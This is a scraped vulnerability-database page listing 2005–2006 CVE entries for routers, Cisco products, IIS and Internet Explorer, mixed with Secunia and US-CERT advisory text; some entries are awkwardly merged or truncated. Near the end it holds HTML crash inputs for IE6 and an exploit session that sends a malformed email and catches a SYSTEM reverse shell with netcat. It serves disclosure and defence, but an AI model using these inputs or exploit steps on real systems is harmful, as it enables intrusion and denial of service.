VARIoT IoT vulnerabilities database
VAR-200508-0235 | CVE-2005-2419 | ECI Telecom B-FOCuS Router 312+ Unauthorized Access Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
B-FOCuS Router 312+ allows remote attackers to bypass authentication and gain unauthorized access via a direct request to firmwarecfg.
An attacker can disclose the administrator password through the Web interface of the device.
This can lead to a complete compromise of the router. B-FOCuS Router 312+ router can provide users with reliable and secure ADSL2+ connection. By default, the management interface of the eci router is available via HTTP, which is protected by a login screen. But an attacker can easily bypass the login screen by visiting the firmwarecfg page in the unprotected cgi-bin directory and download the router's current settings, including plaintext connection and management passwords.
----------------------------------------------------------------------
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-
Sicherheit:
http://secunia.com/secunia_vacancies/
----------------------------------------------------------------------
TITLE:
ECI B-FOCuS Router firmwarecfg Missing Access Control Restrictions
SECUNIA ADVISORY ID:
SA16205
VERIFY ADVISORY:
http://secunia.com/advisories/16205/
CRITICAL:
Moderately critical
IMPACT:
Security Bypass
WHERE:
>From local network
OPERATING SYSTEM:
B-FOCuS Router 312+
http://secunia.com/product/5436/
DESCRIPTION:
D.is.evil has reported a security issue in B-FOCuS Router 312+, which
can exploited by malicious people to bypass certain security
restrictions.
The problem is caused due to the lack of access controls on the
"/cgi-bin/firmwarecfg" page of the router's web management interface.
This can reportedly be exploited to retrieve sensitive information
such as the current router settings, connection and management
passwords, or to cause a DoS by resetting the router constantly.
PROVIDED AND/OR DISCOVERED BY:
D.is.evil
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200507-0117 | CVE-2005-2196 | Apple AirPort WEP key Security restriction bypass vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
The Apple AirPort card uses a default WEP key when not connected to a known or trusted network, which can cause it to automatically connect to a malicious network.
This can lead to various attacks against the affected computer.
This issue does not affect AirPort Extreme. Apple AirPort is a Wi-Fi base station product of Apple (Apple). The product supports streaming music and wireless printing. A security restriction bypass vulnerability exists in Apple AirPort
VAR-200507-0116 | CVE-2005-2195 | Apple Darwin Streaming Server Denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Apple Darwin Streaming Server 5.5 and earlier allows remote attackers to cause a denial of service (application crash) via a URL with a filename containing a .cgi extension and an MS-DOS device name such as AUX, CON, PRN, COM1, or LPT1, a different vulnerability than CVE-2003-0421 and CVE-2003-0502. Darwin Streaming Server is prone to a denial-of-service vulnerability.
----------------------------------------------------------------------
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-
Sicherheit:
http://secunia.com/secunia_vacancies/
----------------------------------------------------------------------
TITLE:
Apple Darwin Streaming Server Web Admin Denial of Service
SECUNIA ADVISORY ID:
SA16056
VERIFY ADVISORY:
http://secunia.com/advisories/16056/
CRITICAL:
Less critical
IMPACT:
DoS
WHERE:
>From remote
SOFTWARE:
Darwin Streaming Server 5.x
http://secunia.com/product/3085/
DESCRIPTION:
Sowhat has reported a vulnerability in Darwin Streaming Server, which
can be exploited by malicious people to cause a DoS (Denial of
Service).
The vulnerability is caused due to an error in the web-based admin
interface when handling HTTP requests containing MS-DOS device names
with ".cgi" extension appended (e.g. AUX.cgi).
Successful exploitation causes the service to stop responding.
The vulnerability has been reported in versions 5.5 and prior for
Windows.
SOLUTION:
Update to version 5.5.1.
PROVIDED AND/OR DISCOVERED BY:
Sowhat
ORIGINAL ADVISORY:
http://secway.org/Advisory/AD20050713.txt
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200507-0149 | CVE-2005-2279 | Cisco ONS 15216 OADM telnet Denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco ONS 15216 Optical Add/Drop Multiplexer (OADM) running firmware 2.2.2 and earlier allows remote attackers to cause a denial of service (management plane session loss) via crafted telnet data. The Cisco ONS 15216 OADM has separate data planes, one that exists solely for device management, and the other that exists for data transport purposes.
When the vulnerability is triggered, the Telnet service will no longer respond to subsequent legitimate requests. However, the data plane (Network traffic that is being switched and transmitted by the device.) is not affected by this attack.
This vulnerability exists in the Cisco ONS 15216 OADM device that is running software release 2.2.2 and earlier software releases. Cisco ONS is an optical network platform developed by CISCO
VAR-200507-0150 | CVE-2005-2280 | Cisco Security Agent malformed IP packet denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Security Agent (CSA) 4.5 allows remote attackers to cause a denial of service (system crash) via a crafted IP packet. The CSA has a vulnerability in handling malformed IP packets. The remote attacker can exploit this vulnerability to perform a denial of service attack on the device. Repeated attackers can lead to continued denial of service. This issue may be triggered by a maliciously crafted IP packet. This vulnerability affects only CSA 4.5 on Windows operating systems other than Windows XP. A denial of service vulnerability exists in CSA 4.5
VAR-200507-0192 | CVE-2005-2242 | Cisco CallManager Denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco CallManager (CCM) 3.2 and earlier, 3.3 before 3.3(5), 4.0 before 4.0(2a)SR2b, and 4.1 4.1 before 4.1(3)SR1 allows remote attackers to cause a denial of service (memory consumption and restart) via crafted packets to (1) the CTI Manager (ctimgr.exe) or (2) the CallManager (ccm.exe). The CallManager CTI Manager service is susceptible to a remote denial of service vulnerability.
This issue is documented in Cisco bug CSCee00116, which is available to Cisco customers.
This issue may be exploited to cause the affected application to restart, denying service to legitimate users.
This issue was originally documented in BID 14227. Cisco CallManager (CCM) is a set of call processing components based on the Cisco Unified Communications solution of Cisco. There are denial of service vulnerabilities in multiple versions of CCM (3.2 and earlier, 3.3 earlier than 3.3(5), 4.0 earlier than 4.0(2a)SR2b, and 4.1 4.1 earlier than 4.1(3)SR1)
VAR-200507-0193 | CVE-2005-2243 | Cisco CallManager inetinfo.exe Denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Memory leak in inetinfo.exe in Cisco CallManager (CCM) 3.2 and earlier, 3.3 before 3.3(5), 4.0 before 4.0(2a)SR2b, and 4.1 4.1 before 4.1(3)SR1, when Multi Level Admin (MLA) is enabled, allows remote attackers to cause a denial of service (memory consumption) via a large number of Admin Service Tool (AST) logins that fail.
This issue is documented in Cisco bug CSCef47060, which is available to Cisco customers.
Attackers may exploit this vulnerability by repeatedly attempting, and failing, to log into the affected service. It is reported that as much as 750 megabytes of memory may be consumed, resulting in a sever reduction in performance, possibly denying service to legitimate users.
This issue was originally documented in BID 14227. Cisco CallManager (CCM) is a set of call processing components based on the Cisco Unified Communications solution of Cisco. Inetinfo.exe in multiple versions of CCM (3.2 and earlier, 3.3 before 3.3(5), 4.0 before 4.0(2a)SR2b, and 4.1 and 4.1 before 4.1(3)SR1) has memory leaks, which may result in a denial of service
VAR-200507-0194 | CVE-2005-2244 | Cisco CallManager aupair.exe Buffer overflow vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The aupair service (aupair.exe) in Cisco CallManager (CCM) 3.2 and earlier, 3.3 before 3.3(5), 4.0 before 4.0(2a)SR2b, and 4.1 4.1 before 4.1(3)SR1 allows remote attackers to execute arbitrary code or corrupt memory via crafted packets that trigger a memory allocation failure and lead to a buffer overflow. The CallManager aupair service is susceptible to an unspecified remote buffer overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer.
This issue is documented in Cisco bug CSCsa75554, which is available to Cisco customers.
This vulnerability allows remote attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in crashing the affected process, denying service to legitimate users.
This issue was originally documented in BID 14227. Cisco CallManager (CCM) is a set of call processing components based on the Cisco Unified Communications solution of Cisco
VAR-200507-0195 | CVE-2005-2245 | F5 BIG-IP Unknown vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Unknown vulnerability in F5 BIG-IP 9.0.2 through 9.1 allows attackers to "subvert the authentication of SSL transactions," via unknown attack vectors, possibly involving NATIVE ciphers. F5 BIG-IP is susceptible to an unspecified SSL authentication bypass vulnerability.
It is conjectured that if the BIG-IP is configured to authenticate by utilizing certificate-based authentication, attackers may be able to bypass the requested authentication checks. This allows remote attackers to gain access to protected Web sites. Depending on the nature of the protected Web sites, various further attacks may also be possible.
Further details are not currently available. This BID will be updated as more information is disclosed.
Versions of BIP-IP from 9.0.2 through to 9.1 are affected. F5 BIG-IP is an all-in-one network device integrated with network traffic management, application security management, load balancing and other functions from F5 Corporation of the United States.
----------------------------------------------------------------------
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-
Sicherheit:
http://secunia.com/secunia_vacancies/
----------------------------------------------------------------------
TITLE:
BIG-IP Unspecified SSL Authentication Security Bypass
SECUNIA ADVISORY ID:
SA16008
VERIFY ADVISORY:
http://secunia.com/advisories/16008/
CRITICAL:
Moderately critical
IMPACT:
Security Bypass
WHERE:
>From remote
OPERATING SYSTEM:
BIG-IP 9.x
http://secunia.com/product/3158/
DESCRIPTION:
A vulnerability has been reported in BIG-IP, which potentially can be
exploited by malicious people to bypass certain security
restrictions.
SOLUTION:
The vendor has issued a security update for versions 9.0.4, 9.0.5,
and 9.1.
ftp://ftp.f5.com/Domestic/bigip/bigip9x-hotfix-CR49528/
As a workaround, the vendor recommends temporarily disabling NATIVE
ciphers on any clientssl or serverssl profiles that require or
request authentication. This may result in a loss of SSL performance.
PROVIDED AND/OR DISCOVERED BY:
Reported by vendor.
ORIGINAL ADVISORY:
F5 Networks:
http://tech.f5.com/home/bigip-next/solutions/security/sol4944.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200507-0191 | CVE-2005-2241 | Cisco CallManager RISDC Denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco CallManager (CCM) 3.2 and earlier, 3.3 before 3.3(5), 4.0 before 4.0(2a)SR2b, and 4.1 4.1 before 4.1(3)SR1 does not quickly time out Realtime Information Server Data Collection (RISDC) sockets, which results in a "resource leak" that allows remote attackers to cause a denial of service (memory and connection consumption) in RisDC.exe.
This issue is documented in Cisco bug CSCed37403, which is available to Cisco customers.
If attackers repeatedly create, and then drop TCP connections to the vulnerable service, excessive memory resources will be consumed, potentially leading to further connections being refused.
This issue was originally documented in BID 14227. Cisco CallManager (CCM) is a set of call processing components based on the Cisco Unified Communications solution of Cisco. A denial of service vulnerability exists in multiple versions of CCM (3.2 and prior, 3.3 prior to 3.3(5), 4.0 prior to 4.0(2a)SR2b, and 4.1 prior to 4.1(3)SR1)
VAR-200507-0210 | CVE-2005-2313 | Check Point SecuRemote NG Privilege escalation vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
Check Point SecuRemote NG with Application Intelligence R54 allows attackers to obtain credentials and gain privileges via unknown attack vectors. Check Point SecuRemote NG is affected by a local information disclosure vulnerability. This issue may allow an attacker to disclose authentication credentials used to access the VPN application.
An attacker could use the information gathered through the exploitation of this vulnerability to gain access to or carry out other attacks against an affected computer or the network protected by the VPN. SecuRemoteNG is Check Point's firewall and VPN system
VAR-200507-0086 | CVE-2005-2181 | Cisco 7940/7960 VoIP Message spoofing vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Cisco 7940/7960 Voice over IP (VoIP) phones do not properly check the Call-ID, branch, and tag values in a NOTIFY message to verify a subscription, which allows remote attackers to spoof messages such as the "Messages waiting" message. 7960 Router is prone to a remote security vulnerability. Cisco 7940/7960 is Cisco's network switching equipment. A remote spoofing vulnerability exists in Cisco 7940/7960 Voice over IP (VoIP) phones. This allows remote attackers to spoof e.g
VAR-200507-0076 | CVE-2005-2169 | Quick&Dirty source.php Directory traversal vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in source.php in Quick & Dirty PHPSource Printer 1.1 and earlier allows remote attackers to read arbitrary files via ".../...//" sequences in the file parameter, which are reduced to "../" when PHPSource Printer uses a regular expression to remove "../" sequences. Quick And Dirty Phpsource Printer is prone to a directory traversal vulnerability.
----------------------------------------------------------------------
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-
Sicherheit:
http://secunia.com/secunia_vacancies/
----------------------------------------------------------------------
TITLE:
Quick & Dirty PHPSource Printer Directory Traversal Vulnerability
SECUNIA ADVISORY ID:
SA15900
VERIFY ADVISORY:
http://secunia.com/advisories/15900/
CRITICAL:
Moderately critical
IMPACT:
Exposure of system information, Exposure of sensitive information
WHERE:
>From remote
SOFTWARE:
Quick & Dirty PHPSource Printer 1.x
http://secunia.com/product/5323/
DESCRIPTION:
Seth Alan Woolley has discovered a vulnerability in Quick & Dirty
PHPSource Printer, which can be exploited by malicious people to gain
knowledge of sensitive information.
Input passed to the "file" parameter in "source.php" is not properly
sanitised before being used.
The vulnerability has been confirmed in version 1.0. Other versions
may also be affected.
SOLUTION:
The vendor has released version 1.1, which does not properly fix the
vulnerability.
Edit the source code to ensure that input is properly verified.
PROVIDED AND/OR DISCOVERED BY:
Seth Alan Woolley
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200507-0067 | CVE-2005-2160 | Ipswitch Imail cookie Information disclosure |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
IMail stores usernames and passwords in cleartext in a cookie, which allows remote attackers to obtain sensitive information. IMail is prone to a information disclosure vulnerability. IMAIL is an email system including WebMail
VAR-200507-0033 | CVE-2005-2089 | Microsoft IIS Multiple security vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Microsoft IIS 5.0 and 6.0 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes IIS to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling.". IIS Far East Edition is prone to a cross-site scripting vulnerability
VAR-200604-0201 | CVE-2006-1188 | RDS.Dataspace ActiveX control bypasses ActiveX security model |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. Microsoft Windows fails to properly handle COM Objects. This vulnerability may allow a remote unauthenticated attacker to execute arbitrary code on a vulnerable system. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. This is related to the handling of certain HTML tags. They could also use HTML email for the attack.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA06-101A
Microsoft Windows and Internet Explorer Vulnerabilities
Original release date: April 11, 2006
Last revised: --
Source: US-CERT
Systems Affected
* Microsoft Windows
* Microsoft Internet Explorer
For more complete information, refer to the Microsoft Security
Bulletin Summary for April 2006.
I.
(CVE-2006-0012)
II. If the user is logged on with
administrative privileges, the attacker could take complete control of
an affected system. An attacker may also be able to cause a denial of
service.
III. Solution
Apply Updates
Microsoft has provided updates for these vulnerabilities in the
Security Bulletins and on the Microsoft Update site.
Workarounds
Please see the US-CERT Vulnerability Notes for workarounds. Many of
these vulnerabilities can be mitigated by following the instructions
listed in the Securing Your Web Browser document.
Appendix A. Please send
email to <cert@cert.org> with "TA06-101A Feedback VU#876678" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2006 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
Apr 11, 2006: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBRDwj9n0pj593lg50AQInJggAoOBNa20SU8JukBoK5elr5vWOLcAjycHt
Cg0+064ncCpQXoWiYPrLGVzg4/MCTVUygbYl85cePp5cHSHqpfuYXoBuZwSKu36+
olQdkbU1ejViA8A0XPsQ3EgtIRlDZSgL1ncYlRM8QxK8CF7QV616ta8q6H/3EDMM
i+tXy6gzQMqJeUthopzGcfpf6U5Qu9PCk/+Pj66GfFhHpARanLef2H28WFRazC+I
R+vLGLFLV0gp1Iy7t267l1BhN1w1z+fXD0WwYkiTwb0mzeize8Amdqlb5c4Vn4wh
HAF/XGiCe5qkMhM7kRLA70JsNfSkI38JPHWSo9/a04wFBKENCAwNpA==
=w6IC
-----END PGP SIGNATURE-----
.
Visit http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.
o Memory Corruption Vulnerability: <mshtml.dll>#7d519030
=================================
Following HTML code forces IE 6 to crash:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
> "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
> <html> <fieldset> <h4>
> <pre><td>
> <menu>
> <legend>
> <a>
> <ul>
> <small>
> <fieldset>
> <h6>
> </h6
> </u>
> </optgroup>
> </tr>
> </map>
> </ul
> </dfn>
>
> </del>
> </h2>
> </dir>
> </ul>
Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html
These are the register values and the ASM dump at the time of the access
violation:
> eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000
> edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894
>
> 7d519012 55 push ebp
> 7d519013 8bec mov ebp,esp
> 7d519015 8b4104 mov eax,[ecx+0x4]
> 7d519018 394508 cmp [ebp+0x8],eax
> 7d51901b 7c09 jl mshtml+0x69026 (7d519026)
> 7d51901d 7edc jle mshtml+0x68ffb (7d518ffb)
> 7d51901f 33c0 xor eax,eax
> 7d519021 40 inc eax
> 7d519022 5d pop ebp
> 7d519023 c20800 ret 0x8
> 7d519026 83c8ff or eax,0xffffffff
> 7d519029 ebf7 jmp mshtml+0x69022 (7d519022)
> 7d51902b 90 nop
> 7d51902c 90 nop
> 7d51902d 90 nop
> 7d51902e 90 nop
> 7d51902f 90 nop
> FAULT ->7d519030 8b4108 mov eax,[ecx+0x8]
> ds:0023:00000008=????????
> 7d519033 85c0 test eax,eax
> 7d519035 7425 jz mshtml+0x6905c (7d51905c)
> 7d519037 8b10 mov edx,[eax]
> 7d519039 f6c210 test dl,0x10
> 7d51903c 7408 jz mshtml+0x69046 (7d519046)
> 7d51903e f6c220 test dl,0x20
> 7d519041 7519 jnz mshtml+0x6905c (7d51905c)
> 7d519043 8b400c mov eax,[eax+0xc]
> 7d519046 8b4808 mov ecx,[eax+0x8]
> 7d519049 85c9 test ecx,ecx
o Memory Corruption Vulnerability: <mshtml.dll>#7d529d35
=================================
Following HTML code forces IE 6 to crash:
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
> "http://www.w3.org/TR/html4/loose.dtd">
> <bdo>
> </span>
> <pre>
>
> <param>
> <form>
> <colgroup>
> <small>
> </small>
> </colgroup>
> </map>
> </button>
> </code
>
> <blockquote>
> <th>
> <small>
>
> </tbody>
> </tr>
> </ol>
> </tbody>
> </ol>
> </code>
> </strong>
>
>
> <head>
> <fieldset>
> <style>
>
> </style
> </dir>
> </a>
> </td
> </li>
> </label
> </object>
> </bdo
> </th
> </object
> </q>
>
> <ol>
> <object>
Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html
These are the register values and the ASM dump at the time of the access
violation:
> eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0
> edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778
>
> 7d529d0e e811170000 call mshtml+0x7b424 (7d52b424)
> 7d529d13 85c0 test eax,eax
> 7d529d15 0f85c5500800 jne mshtml!DllGetClassObject+0x10fa2
> (7d5aede0)
> 7d529d1b 0fb65508 movzx edx,byte ptr [ebp+0x8]
> 7d529d1f 8d849680000000 lea eax,[esi+edx*4+0x80]
> 7d529d26 5e pop esi
> 7d529d27 5d pop ebp
> 7d529d28 c20c00 ret 0xc
> 7d529d2b 90 nop
> 7d529d2c 90 nop
> 7d529d2d 90 nop
> 7d529d2e 90 nop
> 7d529d2f 90 nop
> 7d529d30 8bff mov edi,edi
> 7d529d32 55 push ebp
> 7d529d33 8bec mov ebp,esp
> FAULT ->7d529d35 0fbe4114 movsx eax,byte ptr [ecx+0x14]
> ds:0023:00000014=??
> 7d529d39 c1e004 shl eax,0x4
> 7d529d3c 0578aa4b7d add eax,0x7d4baa78
> 7d529d41 7410 jz mshtml+0x79d53 (7d529d53)
> 7d529d43 8b400c mov eax,[eax+0xc]
> 7d529d46 234508 and eax,[ebp+0x8]
> 7d529d49 f7d8 neg eax
> 7d529d4b 1bc0 sbb eax,eax
> 7d529d4d f7d8 neg eax
> 7d529d4f 5d pop ebp
> 7d529d50 c20400 ret 0x4
> 7d529d53 33c0 xor eax,eax
> 7d529d55 ebf8 jmp mshtml+0x79d4f (7d529d4f)
o Vulnerable versions:
=====================
The DoS vulnerability was successfully tested on:
> MS IE 6 SP2 - Win XP Pro SP2
> MS IE 6 - Win 2k SP4
o Disclosure Timeline:
=====================
xx Feb 06 - Vulnerabilities discovered.
08 Mar 06 - Vendor contacted.
22 Mar 06 - Vendor confirmed vulnerabilities.
25 May 06 - Public release.
o Solution:
==========
Install the latest security update (MS06-013) for Internet Explorer [2].
o Credits:
=========
Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@morph3us.org' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.
Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.
----------------------------------------------------------------------
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-
Sicherheit:
http://secunia.com/secunia_vacancies/
----------------------------------------------------------------------
TITLE:
Microsoft Design Tools msdds.dll Code Execution Vulnerability
SECUNIA ADVISORY ID:
SA16480
VERIFY ADVISORY:
http://secunia.com/advisories/16480/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
>From remote
SOFTWARE:
Microsoft Visual Studio .NET 2003
http://secunia.com/product/1086/
Microsoft Office 2003 Student and Teacher Edition
http://secunia.com/product/2278/
Microsoft Office 2003 Standard Edition
http://secunia.com/product/2275/
Microsoft Internet Explorer 5.01
http://secunia.com/product/9/
Microsoft Internet Explorer 5.5
http://secunia.com/product/10/
Microsoft Internet Explorer 6.x
http://secunia.com/product/11/
Microsoft Office 2003 Professional Edition
http://secunia.com/product/2276/
Microsoft Office 2003 Small Business Edition
http://secunia.com/product/2277/
DESCRIPTION:
A vulnerability has been reported in Microsoft Visual Studio .NET,
which potentially can be exploited by malicious people to compromise
a vulnerable system.
The COM object is known to be installed as part of the following
products:
* Microsoft Visual Studio .NET 2003
* Microsoft Office Professional 2003
Other products may also include the affected COM object.
NOTE: An exploit has been published. However, there are currently
conflicting reports about the exploitability of this issue. Some
reports confirm that code execution is possible, while other reports
indicate that the problem can't be reproduced. Secunia has currently
not been able to reproduce the vulnerability in version 7.10.3077.0
of the COM object.
This advisory will be updated when more information is available.
SOLUTION:
Restrict use of ActiveX controls to trusted web sites only.
PROVIDED AND/OR DISCOVERED BY:
Reported by anonymous person.
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200510-0005 | CVE-2005-1987 | Microsoft Internet Explorer can use any COM object |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. Microsoft DDS Library Shape Control COM object contains an unspecified vulnerability, which may allow a remote attacker to execute arbitrary code on a vulnerable system. This issue is due to a failure of the library to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer.
This issue presents itself when an attacker sends a specifically crafted email message to an email server utilizing the affected library.
The vulnerability has been reported in the following versions:
* Windows 2000 (remote code execution)
* Windows XP Service Pack 1 (remote code execution)
* Windows XP Service Pack 2 (local privilege escalation)
* Windows Server 2003 (local privilege escalation)
* Windows Server 2003 Service Pack 1 (local privilege escalation)
3) An error in the MSDTC when validating TIP (Transaction Internet
Protocol) requests can be exploited to cause the service to stop
responding via a specially crafted network message. The malicious TIP
message can be transferred through the affected system to another,
which causes the MSDTC on both systems to stop responding.
Successful exploitation requires that the TIP protocol is enabled for
MSDTC.
SOLUTION:
Apply patches.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. SEC-1 LTD. The vulnerability exists when
event sinks are used within Microsoft Exchange 2000 or Microsoft Mail
services to parse e-mail content. Several Content Security packages
were identified to be vulnerable/exploitable.
The vulnerability can be exploited by crafting an e-mail with a large
header name such as "Content-Type<LARGE STRING>:".
A failure to correctly determine the length of the string results in a
stack overflow. Under
certain conditions the vulnerability can also be used to bypass content
security mechanisms such as virus and content security scanners. Proof
of
concept code to recreate the problem is included at the bottom of this
advisory.
Exploit Availability:
Sec-1 do not release exploit code to the general public.
Attendees of the Sec-1 Applied Hacking & Intrusion prevention course
will receive a copy of this exploit as part of the Sec-1 Exploit
Arsenal.
See: http://www.sec-1.com/applied_hacking_course.html
Exploit Example:
[root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53
Enter IP address of your attacking host: 10.0.0.200
Enter Port for shellcode to connect back on: 80
[*]----Connected OK!
[*]----Sending MAIL FROM: me@test.com
[*]----Sending RCPT TO: <me@test.com>
[*]----Sending Malformed E-mail body
[*]----Shellcode Length: 316
[*]----Shellcode type: Reverse shell
[*]----Done.
[!] Note this may take a while. Inetinfo will crash and restart
This will happen until a nops are reached. You may also want
to clear the queue to restore Inetinfo.exe by deleting malformed
e-mail from c:\Inetpub\mailroot\Queue
[root@homer PoC]# nc -l -p 80 -v
listening on [any] 80 ...
10.0.0.53: inverse host lookup failed: Unknown host
connect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>c:\whoami
NT AUTHORITY\SYSTEM
C:\WINNT\system32>
Vendor Response:
